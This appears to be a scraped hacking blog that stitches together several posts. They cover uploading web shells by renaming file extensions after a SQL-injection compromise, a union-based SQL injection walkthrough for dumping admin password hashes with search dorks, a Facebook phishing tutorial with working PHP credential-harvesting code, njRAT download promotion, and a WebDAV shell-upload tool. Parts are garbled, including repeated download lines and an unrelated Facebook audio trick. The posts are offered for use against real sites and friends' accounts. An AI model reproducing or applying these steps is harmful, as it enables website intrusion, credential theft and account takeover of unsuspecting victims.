Uploading Web Shells using Live HTTP Headers

Following the previous post , once you have successfully exploited an SQLi vulnerability and dumped the database for a particular website, you will probably want to do more than just log in to an administrative control panel. It’s no secret, yet somehow many people simply do not know what to do with a website once they have compromised the database and gained admin credentials to the control panel (phpmyadmin, webstore, etc). Today I will tell you how to upload a web shell through the use of HTTP header manipulation.

Many administrative or user panels allow you to upload images for use as an avatar or for use in a gallery, etc. Attempting to upload anything that does not have an image file extension (.jpg, .bmp, .gif, etc) is typically rejected. This is obviously a problem if you are interested in uploading your own files or shells, which is where this guide can prove to be a valuable resource.

Requirements: 

• Mozilla Firefox
• Live HTTP Headers – Firefox Addon – Will require a browser restart after installation.
• Web Shells (i.e C99, R57, etc.)

(Uploading Web Shells using Live HTTP Headers) Tutorial:

1. Login to the compromised site as an admin (using the credentials you dumped from the SQL database), then find a place to upload a file in that particular site. (Typically an image upload form)
2. Then rename your shell name to shell.php.jpg (or what ever that site supports. In most cases, the upload form will tell you what filetypes are acceptable. For simplicity in this tutorial, I have renamed it to shell.php.jpg.)
3. Start the Live HTTP Headers addon by clicking “Tools” in the firefox menu bar, and selecting Live HTTP Headers from the dropdown list.
4. Upload your shell (shell.php.jpg) in the browser using the upload form.
5. You should now see something similar to this in Live HTTP Headers:
6. In the Live HTTP Headers window, locate and click on the “shell.php.jpg” text.
7. Click on the Replay button.
8. A new window will open, in that window there will be two boxes.
9. In the bottom box, find the name of your shell (shell.php.jpg) and rename it to shell.php and click the Replay button again.

Determine where the image uploading form is storing the uploaded files, typically done by finding a legitimate image uploaded with the form, and right clicking on it to view its properties. For example, say the form uploads images to a folder called ‘images’. You right click your avatar image and determine that the uploading form stores the images in the ‘www.example.com/images/’ folder. This is where your shell will be located. We can access our shell by navigating our browser to www.example.com/images/shell.php.

SQL Injection | Step by Step deface website

What is SQL Injection?

SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT,DELETE are used to update information in the database.
In this type of Attack, we make use of a vulnerability where in we supply our own commands to the website’s database and successfully deface it :D . This vulnerability occurs when the user’s input is not filtered or improperly filtered .

 

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.

 

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.

 

Using Dorks

Now basically what a dork does is uses Google’s “inurl” command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. 

NOTE: Don’t mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.

inurl:”products.php?prodID=”

inurl:buy.php?category=

Exploiting the vulnerability 

You have a vulnerable URL
www.something.com/news/news.php?id=130
Ok , Now how do you deface it   ??

Finding number of columns

Now put the following in the url
http://www.something.com/news/news.php?id=130 order by 10–
Now we told the database to order it by 10^th column. Your job is to find how many columns are there in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply put 11 and try.
Also, the — “are two dashes – -” in the end means “comment”. So anything after this statement is commented off and only our query is put in.
So assume I got error for order by 10, then I tried order by 9 and so on.. Finally I got no error at 6 and error at 7. Hence, the Table has 6 columns .

Find Vulnerable columns

Now we will use union all and select command to find a vulnerable column.Remember to replace that ID number by – that. Like here, I have made it id= -130.
http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6,–
Since it has 6 columns, we do select all 1,2,3,4,5,6 and a – at the end.
This will give an output . Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.

Finding tables

Now our job is to find the different tables in the database. We do the following:
http://www.something.com/news/news.php?id=-130 union select all group_concat(table_name),3,4,5,6 from information_schema.tables where  table_schema=database() –
Here group_concat(table_name) will give you all the table names in the database. Infromation_schema hold information about the database. So we are just querying from that .

Finding Column names

Similarly get all the columns by simply replacing ‘table’ with ‘column’
http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()–
Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be a “id” and then all columns from next table and so on.
If this doesn’t work then you can do
http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where  table_name=”some table you got from the previous step”–

Final Step

Now in list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want. Eg username and password columns from tbl_admin table
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin–
Now I just put the column names in the group_concat with 0x3a in between which is ascii for colon and tbl_admin is the table name where these columns are.
Now I got output something like
admin:”encrypted hash”,user2:”encrypted hash”, and so on…
So usernames are  not encrypted here and passwords are encrypted.
So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google :p

 

 

How To Hack Facebook With Phishing Page

  

As we all want to hack our friend facebook account,and want to read all his personal things.

Today i m gonna teach you how to hack a facebook account with a phishing page.

Phishing:

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

 

 

FACEBOOK PHISHING....

 

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

                                          

2. now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.

3. Now open the notepad and press CTRL+F,and type ACTION.

                                                  

                                           

4. You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5. Delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6. Now save it on your desktop with the name index.htm,not index.html,remember.

7. Now your phishing page is ready.it will look like a pic given below .

index

                                                   
8. Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9. You have two files now one is index.htm and another is post.php,remember file extension is important.

10. Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11. I prefer u to use 000webhost because it will be easy to use.
                           

                                              

12. You have to make a account in that ,after that it looks like a picture given below.

                                                                          
13. Now go control pannel,then on file manager.

14. After that a new window will pop up.Now go to public_html.

                                           
                                        

15. Delete the file named default.php,after that upload two files index.htm and post.php one by        one .

                                        
16. Now the last step click on view of index.htm it will look same as facebook page.

this is your Facebook phishing page

                                         

17. Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18. Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                

                                        

19. Click on view now u will have your friend's password and email id.

                                           

20. This is a simple trick to hack any Facebook password account by phishing page.

21. If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.


                                     Click here to View a Video Tutorial ....

Note:

phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....

                                               
                                                        Thank You...
            

 

Download Njrat New Version 0.7

 

Njrat Is Using for System Hacking

Nj-Rat is Using Fpr System Hacking

Nj-Rat is Using Fpr System Hacking

Nj-Rat is Using Fpr System Hacking

Nj-Rat is Using Fpr System Hacking

 

Nj-Rat is Using Fpr System Hacking

Download Windows 10 Technical Preview

 

Download: 32bit

Download 64 Bit

Download 64 Bit

Download: 64bit

Download 32 Bit:

Download 32 Bit:

Download 32 Bit:

Do

Download 32 Bit:

Download 32 Bit:

Download 32 Bit:

Trick to Publish Audio Comments on Any Facebook Status Update

How to Publish Audio Comments/Messages on Fb

 

The trick is actually very simple and i will try my best to make you understand with Simple Steps. So lets get Started.

Step 1: Open Google Chrome Browser. If you do not have it installed then Download > Install > Open.

Step 2: Now Download and Install Talk and Comment Extention from Google play store.

Step 3: If you have installed any Extentions earlier then Step 2 would be kind of No explanation needed Step. Once the extention is successfully Installed in your Browser, it will automatically open new Tab where it will ask for your permission to use your MIC. Click on Allow.

Step 4: Till now Extention Installation part is Complete, Now the real fun begins. So Login to facebook. You will see Mic Icon added to your Comment box and Chat box. if you see it then you are on right track.

Step 5: To publish your Audio comment on your Friend's facebook status or to send them Audio message Simple Click and hold that MIC icon, Now Speak to Record your Comment/Message.

Step 6: Once you are done with Recording part, Simply Release the MIC icon to Upload the audio. You will see a Link, Press Enter to Publish your Comment or Send your Audio message to your Friend.

Step 7: Cross check by Clicking on Play icon to hear your recorded message/Comment which others will.

Hmei7 Webdav

Hmei7 WebDav

 

 Webdav is a vulnerability for website long time ago but there still websites that are vulnerable with this. I am sharing this tool for those who don't know yet about this tool. This tool automatically uploads a asp shell in the webdav vulnerable website. If it's not vulnerable, the tool will say it's not vulnerable.

How to use Hmei7 Rootkit?

1. Open the rootkit.exe then click menu button WebDav and click "asp shell maker"
2. Then you will be prompt into a new window like the image below.

3. Click Settings for viewing or putting your own asp shell, you can load the shell from a text file. The image above shows it all already.

 

4. Click Add Site to add the webdav vulnerable website then click Ok.

 

5. Lastly, click "Serang !!!" to begin the process of hacking the website which is webdav vulnerable. Anyways, you can know if shell is injected by the report in the left portion of the tool.


Enjoy Webdaving! :3
Credits to Hmei7

Download Link 

Download Link 2

 

Some Webdav Dorks